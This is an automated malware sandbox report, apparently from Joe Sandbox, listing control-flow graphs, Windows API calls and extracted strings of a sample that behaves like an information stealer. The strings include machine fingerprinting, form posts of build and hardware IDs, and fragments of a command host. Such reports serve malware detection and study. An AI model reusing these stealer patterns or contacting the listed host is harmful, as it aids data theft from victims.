                                                            control_flow_graph 1175 401284-401380 call 423d30 * 2 lstrcatA * 13 call 410c85 1181 401385-401389 1175->1181 1182 4013a5-4013a7 1181->1182 1183 40138b-40138d 1181->1183 1186 4013aa-4013ac 1182->1186 1184 4013a1-4013a3 1183->1184 1185 40138f-401395 1183->1185 1184->1186 1185->1182 1187 401397-40139f 1185->1187 1188 4013e9-4013f5 call 41d12a 1186->1188 1189 4013ae-4013b4 call 410c53 1186->1189 1187->1181 1187->1184 1192 4013b9-4013bd 1189->1192 1194 4013d9-4013db 1192->1194 1195 4013bf-4013c1 1192->1195 1198 4013de-4013e0 1194->1198 1196 4013c3-4013c9 1195->1196 1197 4013d5-4013d7 1195->1197 1196->1194 1199 4013cb-4013d3 1196->1199 1197->1198 1198->1188 1200 4013e2-4013e3 ExitProcess 1198->1200 1199->1192 1199->1197
                                                            APIs
                                                            • _memset.LIBCMT ref: 004012A7
                                                            • _memset.LIBCMT ref: 004012B6
                                                            • lstrcatA.KERNEL32(?,0043AAA4), ref: 004012D0
                                                            • lstrcatA.KERNEL32(?,0043AAA8), ref: 004012DE
                                                            • lstrcatA.KERNEL32(?,0043AAAC), ref: 004012EC
                                                            • lstrcatA.KERNEL32(?,0043AAB0), ref: 004012FA
                                                            • lstrcatA.KERNEL32(?,0043AAB4), ref: 00401308
                                                            • lstrcatA.KERNEL32(?,0043AAB8), ref: 00401316
                                                            • lstrcatA.KERNEL32(?,0043AABC), ref: 00401324
                                                            • lstrcatA.KERNEL32(?,0043AAC0), ref: 00401332
                                                            • lstrcatA.KERNEL32(?,0043AAC4), ref: 00401340
                                                            • lstrcatA.KERNEL32(?,0043AAC8), ref: 0040134E
                                                            • lstrcatA.KERNEL32(?,0043AACC), ref: 0040135C
                                                            • lstrcatA.KERNEL32(?,0043AAD0), ref: 0040136A
                                                            • lstrcatA.KERNEL32(?,0043AAD4), ref: 00401378
                                                              • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                              • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                              • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                            • ExitProcess.KERNEL32 ref: 004013E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                            • String ID:
                                                            • API String ID: 1553874529-0
                                                            • Opcode ID: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
                                                            • Instruction ID: 9778931569992fdfa2ae274a5f191432572d6dba79c88691fb85554d5ade8f97
                                                            • Opcode Fuzzy Hash: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
                                                            • Instruction Fuzzy Hash: 9A41A9B2D4422C57DB20EBB19C59FDB7BAC9F18310F5405A3E8D9E3181D67C9A84CB58

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1201 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 1218 406000 1201->1218 1219 406006-40600c 1201->1219 1218->1219 1220 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 1219->1220 1221 4066ff-406727 call 408048 1219->1221 1220->1221 1299 4061a2-4061dc 1220->1299 1230 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d12a 1221->1230 1231 406729-406761 call 410549 call 410609 call 41058d call 402920 1221->1231 1231->1230 1301 4061e2-4061e8 1299->1301 1302 4066f3 1299->1302 1303 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 427170 * 2 1301->1303 1304 4061ea-4061ff 1301->1304 1302->1221 1456 4066d2-4066ea InternetReadFile 1303->1456 1304->1303 1457 406692-40669a 1456->1457 1458 4066ec 1456->1458 1457->1458 1459 40669c-4066cd call 410609 call 41058d call 402920 1457->1459 1458->1302 1459->1456
                                                            APIs
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                            • _memmove.LIBCMT ref: 00406639
                                                            • _memmove.LIBCMT ref: 00406662
                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet_memmove$CrackFileRead
                                                            • String ID: "$"$"$------$------$------$------$af641acce3f8c85bf2490a9b3aa972c5$build_id$mode
                                                            • API String ID: 2247928238-1631910280
                                                            • Opcode ID: 9130669875251964c831f1a88f491c766dae42b48f3d6367ba80e634a4db9760
                                                            • Instruction ID: 761880eafc7f1130453e9609930188909abd0ac3e1dc834df3bf91bb01064538
                                                            • Opcode Fuzzy Hash: 9130669875251964c831f1a88f491c766dae42b48f3d6367ba80e634a4db9760
                                                            • Instruction Fuzzy Hash: 9E22C9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1661 417151-4171ea call 42e4b0 call 4104e7 call 410c53 call 410609 * 3 call 41058d call 402920 * 3 1682 4171f3-417204 1661->1682 1684 417206-4172fc call 4104e7 call 418221 call 410549 * 2 1682->1684 1685 4171ec 1682->1685 1695 417303-417318 1684->1695 1685->1682 1695->1695 1696 41731a 1695->1696 1697 417321-417336 1696->1697 1697->1697 1698 417338-41733d 1697->1698 1699 417344-417362 1698->1699 1699->1699 1700 417364-417366 1699->1700 1701 41736d-41738b 1700->1701 1701->1701 1702 41738d 1701->1702 1703 417394-41739f call 41830d 1702->1703 1706 4173a1-4173aa 1703->1706 1707 4173ab-4173b6 call 418335 1706->1707 1710 4173b8-4173e1 call 402f12 call 418a63 call 40113b 1707->1710 1717 4176a7-41785e call 411c4a call 41058d call 402920 call 4104e7 call 410609 call 4105c7 call 41058d call 402920 * 2 CreateDirectoryA call 401cfd call 4169b6 call 41835d call 416e9b call 41058d * 2 call 410519 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410519 call 4104e7 call 4109a2 call 410519 call 404b2e call 4139c2 1710->1717 1718 4173e7-417681 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 41257f 1710->1718 1838 417860 1717->1838 1839 41786b-4179ae call 4104e7 call 401cfd call 405f39 call 41343f call 4104e7 call 401cfd call 405f39 call 413259 call 4104e7 call 401cfd call 405f39 call 413390 call 401cfd call 413b86 call 410519 call 4104e7 call 405237 call 401cfd call 40eabc 1717->1839 1964 417686-417688 1718->1964 1838->1839 1916 4179b0-417a18 call 4104e7 call 401cfd call 405f39 call 4134d8 call 401cfd call 40274e 1839->1916 1917 417a1e-417a26 1839->1917 1916->1917 1920 417a28-417a99 call 4104e7 call 401cfd call 405f39 call 413198 call 401cfd call 41310c 1917->1920 1921 417a9f-417b1d call 4104e7 call 401cfd call 405f39 call 4135a8 call 401cfd call 415392 1917->1921 1920->1921 1973 417b3d-417b44 1921->1973 1974 417b1f-417b3a call 401cfd call 41566f call 401cfd call 4170c7 1921->1974 1968 41768a-417694 call 41cd7f 1964->1968 1969 41769e-4176a2 call 402920 1964->1969 1968->1969 1969->1717 1975 417b46-417b5c call 401cfd call 415df7 1973->1975 1976 417b5f-417b66 1973->1976 1974->1973 1975->1976 1981 417b81-417b88 1976->1981 1982 417b68-417b7e call 401cfd call 416330 1976->1982 1984 417bb0-417bb6 1981->1984 1985 417b8a-417ba3 call 401cfd call 4164bd 1981->1985 1982->1981 1992 417ba5 1984->1992 1993 417bb8-417bbf 1984->1993 1985->1984 1992->1984 1998 417bc1-417bd7 call 401cfd call 411f55 1993->1998 1999 417bda-417be1 1993->1999 1998->1999 2001 417be3-417c54 call 4104e7 call 401cfd call 405f39 call 413198 call 401cfd call 41310c 1999->2001 2002 417c5a-417c9c call 4104e7 call 401cfd call 405f39 call 402920 call 40113b 1999->2002 2001->2002 2032 418100-41814d call 412541 call 401cfd call 418381 call 402920 * 2 2002->2032 2033 417ca2-417f43 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 41257f 2002->2033 2059 41814e-418159 call 4130e9 2032->2059 2197 4180f7-4180fb call 402920 2033->2197 2198 417f49-418024 call 41ce34 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 2033->2198 2065 41815b-418164 2059->2065 2067 418165-418170 call 41536f 2065->2067 2073 418172-41817b 2067->2073 2076 41817c-418187 call 4182f2 2073->2076 2081 418189-418192 2076->2081 2083 418193-41819e call 4182b8 2081->2083 2089 4181a0-4181ac 2083->2089 2091 4181ae-4181c1 call 402920 * 2 2089->2091 2101 4181c3 2091->2101 2103 4181ca-4181dd call 402920 * 2 2101->2103 2113 4181df-418220 call 416e9b call 401cde call 402920 * 2 call 41d12a 2103->2113 2197->2032 2234 418025-418030 call 418335 2198->2234 2237 418032-4180e0 call 4104e7 call 410519 * 3 call 405482 call 413198 call 401cfd call 41310c 2234->2237 2254 4180e1-4180ec call 4130e9 2237->2254 2257 4180ee-4180f2 call 402920 2254->2257 2257->2197
                                                            APIs
                                                              • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                              • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                              • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                              • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                              • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                              • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                              • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                            • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041771A
                                                              • Part of subcall function 004139C2: strtok_s.MSVCRT ref: 004139F3
                                                              • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                              • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$CreateHeapProcess32$AllocDirectoryFirstH_prolog3_catch_NameNextProcessSnapshotToolhelp32User
                                                            • String ID: .exe$.exe$_DEBUG.zip$af641acce3f8c85bf2490a9b3aa972c5$cowod.$hopto$http://$org
                                                            • API String ID: 3631202960-1915720452
                                                            • Opcode ID: a214d94b7480a8a3029ff1e86e675eec1ea475f145673b84de7e9ad73fc1cad7
                                                            • Instruction ID: 4ceb97e4bc8bd76a369d1d2619bbd46815a38cac9c71142bc76181b4c2ec3f3b
                                                            • Opcode Fuzzy Hash: a214d94b7480a8a3029ff1e86e675eec1ea475f145673b84de7e9ad73fc1cad7
                                                            • Instruction Fuzzy Hash: AC9244315483419FC620FF26D94268EB7E1FF84308F51482FF58463191DBB8AA8D8B9B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2259 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 2276 404bf5 2259->2276 2277 404bfb-404c01 2259->2277 2276->2277 2278 405194-405236 call 402920 * 8 call 41d12a 2277->2278 2279 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 2277->2279 2279->2278 2350 404d97-404dd1 2279->2350 2352 404dd7-404ddd 2350->2352 2353 405188 2350->2353 2354 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 2352->2354 2355 404ddf-404df4 2352->2355 2353->2278 2461 40515c-405174 InternetReadFile 2354->2461 2355->2354 2462 405176-405183 call 402920 2461->2462 2463 40511c-405124 2461->2463 2462->2353 2463->2462 2464 405126-405157 call 410609 call 41058d call 402920 2463->2464 2464->2461
                                                            APIs
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CrackFileRead
                                                            • String ID: "$"$------$------$------$HxA$build_id$hwid
                                                            • API String ID: 920491182-3648483202
                                                            • Opcode ID: 3e75520d421d15d17480e17177354ca7258db6304e7740180cb8297fdc3c51f4
                                                            • Instruction ID: 21305393b516d721eabc2380545c4b93fc8e403c2138cad973479bd5099e6fae
                                                            • Opcode Fuzzy Hash: 3e75520d421d15d17480e17177354ca7258db6304e7740180cb8297fdc3c51f4
                                                            • Instruction Fuzzy Hash: 0C02C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2521 411203-41127b call 4104e7 RegOpenKeyExA 2524 411281 2521->2524 2525 411478-4114a4 call 410519 call 402920 call 41d12a 2521->2525 2527 411287-4112be RegEnumKeyExA 2524->2527 2529 4112c4-411304 RegOpenKeyExA 2527->2529 2530 41144c-411458 2527->2530 2537 411460 2529->2537 2538 41130a-41133a RegQueryValueExA 2529->2538 2530->2527 2532 41145e 2530->2532 2535 41146c 2532->2535 2535->2525 2537->2535 2540 411440 2538->2540 2541 411340-411350 2538->2541 2540->2530 2541->2540 2543 411356-4113e4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 RegQueryValueExA 2541->2543 2543->2540 2556 4113e6-41143b call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 2543->2556 2556->2540
                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenQueryValue$Enum
                                                            • String ID: - $%s\%s$?
                                                            • API String ID: 2712010499-3278919252
                                                            • Opcode ID: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
                                                            • Instruction ID: 4bdd8942e51cb3c4ef1bdab2b95b8e79246b76881c5f67d30fe8b157efa9521a
                                                            • Opcode Fuzzy Hash: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
                                                            • Instruction Fuzzy Hash: 8A61F7B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                            APIs
                                                            • _memset.LIBCMT ref: 00411607
                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                            • CharToOemA.USER32(?,?), ref: 0041166B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CharOpenQueryValue_memset
                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                            • API String ID: 2355623204-1211650757
                                                            • Opcode ID: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
                                                            • Instruction ID: c9c539ce5467448423737f6d9a950d2a9d5193a79ae08df00dacda0898e1b174
                                                            • Opcode Fuzzy Hash: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
                                                            • Instruction Fuzzy Hash: 7B111EB590021DAFDB10DF90DC89FEAB7BDEB04309F5041E6A659E2052E6759F888F14
                                                            APIs
                                                            • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                            • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
                                                            • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                            • _wtoi64.MSVCRT ref: 004117C1
                                                            • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                            • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                            • String ID:
                                                            • API String ID: 181426013-0
                                                            • Opcode ID: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
                                                            • Instruction ID: 0994ca530c552eb12484d48fed68a7c00db0df5c681817d2f603923d478d8980
                                                            • Opcode Fuzzy Hash: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
                                                            • Instruction Fuzzy Hash: B1114C75A0420ADFCB019FA4CC989EEBBB5AF49310F64417EF215E73A0CB394945CB68
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                            • _memset.LIBCMT ref: 004010D0
                                                            • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004185DC), ref: 00401100
                                                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                            • ExitProcess.KERNEL32 ref: 00401112
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                            • String ID:
                                                            • API String ID: 1859398019-0
                                                            • Opcode ID: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
                                                            • Instruction ID: 46aed83c215a1155ddf1663667cd5ec87320cd9fa35168939231c0eb8388c106
                                                            • Opcode Fuzzy Hash: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
                                                            • Instruction Fuzzy Hash: 57F0C27278122077F22422763C6EFAB5A6C9B42F56F205035F309FB2D0D66998049ABC
                                                            APIs
                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                              • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                              • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                              • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                              • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentInformationProfileVolume_memsetmallocstrncpy
                                                            • String ID: 0xA$:\$C$QuBi
                                                            • API String ID: 1802918048-2474135401
                                                            • Opcode ID: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
                                                            • Instruction ID: a97db629e7901cba1803c5ad0a4512298f3feb58bff5cd952ebdd5184ea07982
                                                            • Opcode Fuzzy Hash: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
                                                            • Instruction Fuzzy Hash: A741AFB1A042289BCB249F749D85ADEBBB9EF19304F0000EAF109E3121E6758FD58F54
                                                            APIs
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C), ref: 0041BD81
                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000), ref: 0041BDB9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CreatePointer
                                                            • String ID:
                                                            • API String ID: 2024441833-0
                                                            • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                            • Instruction ID: 96129ee170b6e52e4a698042c6e04e57a17f8ea6b04b39fd16cd668f0541581b
                                                            • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                            • Instruction Fuzzy Hash: F23165B05047049FDB349F25D898BE77AE9EB14354F108B2FE296D2680D33898C4CB99
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                            • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CrackInternet
                                                            • String ID:
                                                            • API String ID: 1381609488-0
                                                            • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                            • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                            • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                            • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                            APIs
                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CreateFirstH_prolog3_catch_NextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 2623756784-0
                                                            • Opcode ID: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
                                                            • Instruction ID: a342571249a904de89e2d28a6ac51ba89f12813f8da7ed82e50d95a069ae9259
                                                            • Opcode Fuzzy Hash: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
                                                            • Instruction Fuzzy Hash: C1018135600224AFEB61DB609D48FEE77FE9F19301F8400E6E40DE2251EA798B849B35
                                                            APIs
                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                            • _memset.LIBCMT ref: 004116CE
                                                              • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                              • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentProfile_memsetmallocstrncpy
                                                            • String ID: Unknown
                                                            • API String ID: 455225556-1654365787
                                                            • Opcode ID: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
